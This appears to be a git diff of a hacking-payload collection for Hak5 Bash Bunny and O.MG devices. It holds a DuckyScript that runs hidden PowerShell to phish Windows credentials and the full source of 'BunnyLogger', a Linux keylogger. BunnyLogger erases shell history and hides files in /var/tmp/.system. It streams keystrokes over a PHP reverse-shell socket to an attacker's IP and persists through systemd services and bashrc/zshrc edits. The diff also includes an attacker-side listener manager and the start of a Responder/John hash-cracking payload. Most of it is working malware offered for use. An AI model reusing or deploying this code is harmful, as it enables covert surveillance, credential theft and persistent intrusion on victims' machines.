<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
@ -0,0 +1,22 @@
|
|||
# Title: Credz-Plz
|
||||
# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
|
||||
# Author: I am Jakoby
|
||||
# Version: 1.0
|
||||
# Category: Recon
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
|
||||
QUACK ENTER
|
After Width: | Height: | Size: 73 KiB |
After Width: | Height: | Size: 39 KiB |
|
@ -0,0 +1,62 @@
|
|||
## About:
|
||||
* Title: BunnyLogger
|
||||
* Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Credentials
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, Storage
|
||||
|
||||
## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
|
||||
|
||||
### Features:
|
||||
* Live keystroke capturing.
|
||||
* Detailed key logs.
|
||||
* Persistent
|
||||
* Autostart payload on boot.
|
||||
|
||||
### Workflow:
|
||||
* Encoding payload and injecting on target's system.
|
||||
* Checks whether internet is connected to the target system.
|
||||
* If internet is connected then it sends raw keystrokes to attacker.
|
||||
* Attacker processes raw keystrokes.
|
||||
|
||||
### Changes to be made in payload.sh:
|
||||
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
|
||||
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
|
||||
|
||||
### LED Status:
|
||||
* `SETUP` : MAGENTA
|
||||
* `ATTACK` : YELLOW
|
||||
* `FINISH` : GREEN
|
||||
|
||||
### Directory Structure of payload components:
|
||||
| FileName | Directory |
|
||||
| -------------- | ----------------------------- |
|
||||
| payload.txt | /payload/switch1/ |
|
||||
| payload.sh | /payload/ |
|
||||
| xinput | /tools/ |
|
||||
|
||||
### Usage:
|
||||
1. Encode payload.txt and inject into target's system.
|
||||
2. Start netcat listner on attacking system:
|
||||
|
||||
* `nc -lvp <port number> > <log filename>` use this command to create new logfile with raw keystrokes.
|
||||
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to existing logfile.
|
||||
3. Process raw keystrokes using BunnyLoggerDecoder utility:
|
||||
```
|
||||
./bunnyLoggerDecoder
|
||||
bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
|
||||
|
||||
Usage:
|
||||
Decode captured log: [./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
|
||||
|
||||
Options:
|
||||
-f Specify Log file.
|
||||
-m Select Mode(normal|informative)
|
||||
-o Specify Output file.
|
||||
-h For this banner.
|
||||
```
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,50 @@
|
|||
usage () {
|
||||
echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n"
|
||||
echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]";
|
||||
echo -e "\nOptions:"
|
||||
echo -e "-f\tSpecify Log file."
|
||||
echo -e "-m\tSelect Mode(normal|informative)"
|
||||
echo -e "-o\tSpecify Output file."
|
||||
echo -e "-h\tFor this banner."
|
||||
}
|
||||
while getopts o:m:f:h: flag
|
||||
do
|
||||
case "${flag}" in
|
||||
o) output=$OPTARG ;;
|
||||
m) mode=$OPTARG ;;
|
||||
f) filename=$OPTARG ;;
|
||||
h) help=$OPTARG ;;
|
||||
*)
|
||||
usage
|
||||
exit 1
|
||||
esac
|
||||
done
|
||||
|
||||
if [ -z "$output" ] && [ -z "$filename" ]; then
|
||||
usage
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$filename" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$output" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$mode" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" == "normal" ] ; then
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" == "informative" ] ; then
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
|
||||
exit 1
|
||||
fi
|
|
@ -0,0 +1,24 @@
|
|||
#!/bin/bash
|
||||
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
mkdir /var/tmp/.system
|
||||
lol=$(lsblk | grep 1.8G)
|
||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
cp -r $mntt/tools/xinput /var/tmp/.system/
|
||||
echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/xinput
|
||||
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||
chmod +x /var/tmp/.system/reboot
|
||||
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
systemctl --user enable --now reboot.service
|
||||
systemctl --user start --now reboot.service
|
||||
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
||||
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
|
@ -0,0 +1,56 @@
|
|||
# Title: BunnyLogger
|
||||
# Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Unix-like operating systems with systemd.
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING rm /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
|
@ -0,0 +1,39 @@
|
|||
## About:
|
||||
* Title: BunnyLogger 2.0
|
||||
* Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Credentials
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, Storage
|
||||
|
||||
## BunnyLogger 2.0: BunnyLogger is a Key Logger which captures every key stroke of target and send them to attacker.
|
||||
|
||||
### Features:
|
||||
* Live keystroke capturing.
|
||||
* Stored Keystroke capturing.
|
||||
* Bunny Logger Manager: Interactive TUI Dashboard.
|
||||
* Detailed key logs.
|
||||
* Persistent.
|
||||
* Autostart payload on boot.
|
||||
|
||||
### Directory Structure of payload components:
|
||||
|
||||
| FileName | Directory |
|
||||
| -------------- | ------------------------------ |
|
||||
| payload.txt | /payload/switch1/ |
|
||||
| payload.sh | /payload/ |
|
||||
| requirements/* | /payloads/library/bunnyLogger2 |
|
||||
|
||||
### LED Status:
|
||||
|
||||
* `LED SETUP` : MAGENTA
|
||||
* `LED ATTACK` : YELLOW
|
||||
* `LED FINISH` : GREEN
|
||||
|
||||
### Usage:
|
||||
* Install BunnyLogger 2.0: `chmod +x install.sh && sudo ./install.sh`
|
||||
* Run : `bunnyLoggerMgr` to launch BunnyLogger Manager.
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,7 @@
|
|||
#!/bin/bash
|
||||
loc=$HOME/.config/bunnyLogger
|
||||
mkdir $loc
|
||||
cp requirements/payload.sh $loc
|
||||
touch $loc/bunnyLogger.db
|
||||
chmod +x requirements/bunnyLoggerMgr
|
||||
sudo cp requirements/bunnyLoggerMgr /usr/local/bin/
|
|
@ -0,0 +1,53 @@
|
|||
# Title: BunnyLogger
|
||||
# Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Unix-like operating systems with systemd.
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING rm /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
|
@ -0,0 +1,191 @@
|
|||
#!/bin/bash
|
||||
allowAbort=true;
|
||||
myInterruptHandler()
|
||||
{
|
||||
if $allowAbort; then
|
||||
echo
|
||||
echo -e "\n\033[1;34m[INFO]: \e[0mYou terminated bunnyLoggerMgr..." && exit 1;
|
||||
fi;
|
||||
}
|
||||
trap myInterruptHandler SIGINT
|
||||
echo -e "\033[4m\033[1mWelcome to BunnyLogger Manager!!!\033[0m"
|
||||
echo
|
||||
echo -e "1] Fetch Keylogs.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target.\n6] Decode Key Logs."
|
||||
echo
|
||||
read -p "Enter your choice: " ch
|
||||
create(){
|
||||
read -p "Enter Target's name(without whitespaces): " name
|
||||
if [[ $(grep -oh "\w*$name\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $name ]]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mName \"$name\" already exists."
|
||||
exit 1
|
||||
fi
|
||||
read -p "Enter Servers IP: " ip
|
||||
read -p "Enter Unique Port Number(1500-65535): " port
|
||||
read -p "Enter another Unique Port Number(1500-65535): " secPort
|
||||
if [ "$port" == "$secPort" ]; then
|
||||
echo -e "\033[1;34m[INFO]: \033[0mTwo ports can't be similar."
|
||||
exit 1
|
||||
fi
|
||||
if [[ $(grep -oh "\w*$ip\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $port ]] && [[ $(grep -oh "\w*$secPort\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $secPort ]]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mTarget exist with similar IP address \"$ip\" and port number one \"$port\", port number two \"$secPort\"."
|
||||
exit 1
|
||||
fi
|
||||
max=65535
|
||||
min=1500
|
||||
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )) && (( $secPort <= $max )) && (( $secPort >= $min )); then
|
||||
read -p "Specify directory for output: " dir
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
cp -r ~/.config/bunnyLogger/payload.sh $dir
|
||||
fi
|
||||
sed -i -e "s/0.0.0.0/$ip/g" $dir/payload.sh
|
||||
sed -i -e "s/4444/$port/g" $dir/payload.sh
|
||||
sed -i -e "s/5555/$secPort/g" $dir/payload.sh
|
||||
echo -e "$(echo "$name"|xargs)\t$ip\t$port\t$secPort" >> ~/.config/bunnyLogger/bunnyLogger.db
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$ip\" or Port Number \"$port\" or Port Number \"$secPort\"."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
}
|
||||
list(){
|
||||
|
||||
column -t -o ' ' ~/.config/bunnyLogger/bunnyLogger.db | awk '{print NR" - "$0}'
|
||||
}
|
||||
remove(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Enter name of target to remove: " rmv
|
||||
if grep -q $rmv ~/.config/bunnyLogger/bunnyLogger.db; then
|
||||
sed -i "/\b\($rmv\)\b/d" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0m Successfully Removed \"$rmv\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$rmv\" no such target found."
|
||||
fi
|
||||
}
|
||||
update(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Choose target number: " cho
|
||||
read -p "You want to update (ip|portOne|portTwo): " ent
|
||||
if [ "$ent" = ip ]
|
||||
then
|
||||
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||
read -p "Enter new ip: " use
|
||||
if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
|
||||
sed -i -e "$cho s/$one/$use/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mSuccessfully Updated IP."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$use\"."
|
||||
exit
|
||||
fi
|
||||
elif [ "$ent" = portOne ]
|
||||
then
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
|
||||
read -p "Enter new Port number: " useP
|
||||
max=65535
|
||||
min=1500
|
||||
if (( $useP <= $max )) && (( $useP >= $min )); then
|
||||
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
|
||||
fi
|
||||
elif [ "$ent" = portTwo ]
|
||||
then
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
|
||||
read -p "Enter new Port number: " useP
|
||||
max=65535
|
||||
min=1500
|
||||
if (( $useP <= $max )) && (( $useP >= $min )); then
|
||||
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
|
||||
fi
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e0m[Invalid choice \"$ent\"."
|
||||
fi
|
||||
}
|
||||
fetch(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Enter Target number to connect: " cho
|
||||
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
|
||||
three=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
|
||||
echo -en "1] Live Capture \t2]Fetch Stored Logs: "
|
||||
read typ
|
||||
case $typ in
|
||||
1)
|
||||
read -p "Specify directory for output: " dir
|
||||
read -p "Enter filename to store logs: " filename
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
echo "\033[1;34m\e[1m[[INFO]: \e[0mStarted Keylogs Capture..."
|
||||
nc -lvp $two > $dir/$filename.log
|
||||
fi
|
||||
;;
|
||||
2)
|
||||
read -p "Specify directory for output: " dir
|
||||
read -p "Enter filename to store logs: " filename
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
nc -lvp 1444 > $dir/$filename.log &
|
||||
nc -lvp $three
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice.."
|
||||
;;
|
||||
esac
|
||||
}
|
||||
decode(){
|
||||
echo -e "1] Normal Decode \t2] Informative Decode"
|
||||
read -p "Enter your choice: " cho
|
||||
read -p "Enter path of file to decode: " path
|
||||
read -p "Enter path for decoded log: " out
|
||||
case $cho in
|
||||
1)
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path | grep press | awk '{print $4}' > $out
|
||||
;;
|
||||
2)
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path > $out
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice \"$cho\"."
|
||||
;;
|
||||
esac
|
||||
}
|
||||
case $ch in
|
||||
1)
|
||||
fetch
|
||||
;;
|
||||
2)
|
||||
create
|
||||
;;
|
||||
3)
|
||||
list
|
||||
;;
|
||||
4)
|
||||
update
|
||||
;;
|
||||
5)
|
||||
remove
|
||||
;;
|
||||
6)
|
||||
decode
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: Invalid Choice \"$ch\"."
|
||||
;;
|
||||
esac
|
|
@ -0,0 +1,41 @@
|
|||
#!/bin/bash
|
||||
transfer(){
|
||||
echo -e "\033[1;34m[INFO]: Target Logs:\033[0m"
|
||||
cd /var/tmp/.system/logs/
|
||||
ls /var/tmp/.system/logs/ | sort
|
||||
echo
|
||||
echo -n "Enter filename to transfer: "
|
||||
read ch
|
||||
if [ -f $ch ];
|
||||
then
|
||||
echo -e "\033[1;34m[INFO]: Transferring file...\033[0m"
|
||||
/var/tmp/.system/./nc -q 0 127.0.0.1 1444 < $ch >/dev/null 2>&1
|
||||
if [ $? -eq 0 ]; then
|
||||
echo -e "\033[1;32m[SUCCESS]: File Transferred.\033[0m"
|
||||
else
|
||||
echo -e "\033[1;34m[INFO]: Netcat listner is not running on Attacking system.\033[0m\n\033[1;31m[ERROR]: File transfer failed.\033[0m"
|
||||
fi
|
||||
else
|
||||
echo -e "\033[1;31m[ERROR]: Invalid Filename \"$ch\".\033[0m"
|
||||
fi
|
||||
}
|
||||
conti(){
|
||||
while :
|
||||
do
|
||||
echo
|
||||
echo -n "Would you like to transfer more files? [Y/N]: "
|
||||
read ch
|
||||
if [ "$ch" = y ] || [ "$ch" = Y ];
|
||||
then
|
||||
transfer
|
||||
elif [ "$ch" = N ] || [ "$ch" = n ];
|
||||
then
|
||||
echo -e "\033[1;34m[INFO]: Terminating...\033[0m"
|
||||
break
|
||||
else
|
||||
echo -e "\033[1;31m[ERROR]: Invalid Choice \"$ch\".\033[0m"
|
||||
fi
|
||||
done
|
||||
}
|
||||
transfer
|
||||
conti
|
|
@ -0,0 +1,28 @@
|
|||
#!/bin/bash
|
||||
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
mkdir -p /var/tmp/.system/logs
|
||||
lol=$(lsblk | grep 1.8G)
|
||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
cp -r $mntt/tools/xinput /var/tmp/.system/
|
||||
cp -r $mntt/payloads/library/bunnyLogger2/clctrl /var/tmp/.system/
|
||||
cp -r $mntt/payloads/library/bunnyLogger2/nc /var/tmp/.system/
|
||||
chmod +x /var/tmp/.system/nc
|
||||
echo -e "name=\$(date +\"%y-%m-%d-%T\")\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test > /var/tmp/.system/logs/\$name.log &\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/clctrl
|
||||
chmod +x /var/tmp/.system/xinput
|
||||
echo -e "while :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone &\nwhile :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",5555);exec("\"/var/tmp/.system/./clctrl "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||
chmod +x /var/tmp/.system/reboot
|
||||
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
systemctl --user enable --now reboot.service
|
||||
systemctl --user start --now reboot.service
|
||||
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
||||
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
|
@ -0,0 +1,4 @@
|
|||
#!/bin/bash
|
||||
loc=$HOME/.config/bunnyLogger
|
||||
rm -rf $loc
|
||||
sudo rm /usr/local/bin/bunnyLoggerMgr
|
|
@ -0,0 +1,111 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
#Author: rf_bandit
|
||||
#Version: Version 1.0
|
||||
#Credit: Hak5Darren, Mubix, catatonic, mame82
|
||||
#Firmware: 1.7
|
||||
#Date: May 2023
|
||||
#
|
||||
# Options
|
||||
RESPONDER_OPTIONS="-w -r -d -P"
|
||||
LOOTDIR=/root/udisk/loot/bunnypicker
|
||||
WORDFILE= <PATH TO DICTIONARY HERE>
|
||||
#eg /tools/john/password.lst
|
||||
# or install via tools folding in arming mode (/tools/<wordlist>)
|
||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
|
||||
# Check for responder and john
|
||||
REQUIRETOOL responder
|
||||
REQUIRETOOL john
|
||||
|
||||
# Setup Attack
|
||||
LED SETUP
|
||||
|
||||
# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
|
||||
ATTACKMODE HID RNDIS_ETHERNET
|
||||
#ATTACKMODE ECM_ETHERNET
|
||||
|
||||
# Set convenience variables
|
||||
GET TARGET_HOSTNAME
|
||||
GET TARGET_IP
|
||||
|
||||
# Setup named logs in loot directory
|
||||
mkdir -p $LOOTDIR
|
||||
HOST=${TARGET_HOSTNAME}
|
||||
# If hostname is blank set it to "noname"
|
||||
[[ -z "$HOST" ]] && HOST="noname"
|
||||
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
|
||||
COUNT=$((COUNT+1))
|
||||
mkdir -p $LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# As a backup also copy logs to a loot directory in /root/loot/
|
||||
mkdir -p /root/loot/bunnypicker/$HOST-$COUNT
|
||||
|
||||
# Check target IP address. If unset, blink RED and end.
|
||||
